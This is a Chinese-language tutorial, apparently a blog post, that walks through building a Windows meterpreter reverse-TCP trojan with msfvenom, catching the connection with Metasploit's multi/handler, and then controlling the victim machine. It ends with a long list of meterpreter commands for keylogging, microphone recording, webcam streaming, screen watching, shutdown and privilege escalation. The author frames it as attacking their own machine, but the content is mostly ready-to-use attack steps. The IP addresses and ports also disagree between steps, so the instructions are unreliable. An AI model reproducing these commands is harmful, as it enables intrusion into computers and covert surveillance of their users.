1安装 VMware15.5,kali系统,桥接模式
链接:https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw
提取码:3k2w
2修改sshd_config
vim /etc/ssh/sshd_config
去掉这两行注释 完成后保存 esc : wq! 重启SSH服务
/etc/init.d/ssh restartFinalShell链接成功,如下图
提权/查看ip
sudo su ifconfig
生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost="192.168.71.128" lport=5000 -f exe -o /root/payload.exe
获取文件移动权限,将木马移动到靶机
chmod 755 /root 
运行msfconsole
配置参数
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
查看上钩用户,找到靶机192.168.71.1
sessions
选择需要攻击的用户1 sessions -i 1
出现meterpreter表示入侵成功
监控屏幕 run vnc -i
由于我这里是自己的虚拟机入侵自己的物理机,所以成了套娃效果
更多命令
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本